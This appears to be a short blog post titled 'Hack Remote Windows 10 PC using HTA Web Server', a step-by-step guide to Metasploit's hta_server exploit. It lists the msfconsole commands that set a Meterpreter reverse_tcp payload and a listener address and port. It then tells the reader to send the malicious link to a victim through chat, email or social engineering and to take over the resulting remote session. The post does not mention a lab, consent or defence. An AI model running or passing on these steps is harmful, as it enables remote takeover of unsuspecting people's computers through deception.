Hack Remote Windows 10 PC using HTA Web Server

This module hosts an HTML Application (HTA) that when opened will run a payload via Powershell. When a user navigates to the HTA file they will be prompted by IE twice before the payload is executed

 Exploit Targets

Windows All Versions

Requirement

Attacker: kali Linux

Victim PC: Windows 10

Open Kali terminal type msfconsole

Now type use exploit/windows/misc/hta_server

msf exploit (hta_server)>set lhost 192.168.0.104

msf exploit (hta_server)>set srvhost 192.168.0.104

msf exploit (hta_server)>set payload windows/meterpreter/reverse_tcp

msf exploit (hta_server)>set lport 8443

msf exploit (hta_server)>exploit           

Send the link of the server to the victim via chat or email or any social engineering technique. 

When Victim Machine browsing to your link it will download anything.hta file when victim click on it you will get the meterpreter session

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Related Posts Plugin for WordPress, Blogger...

Leave a Reply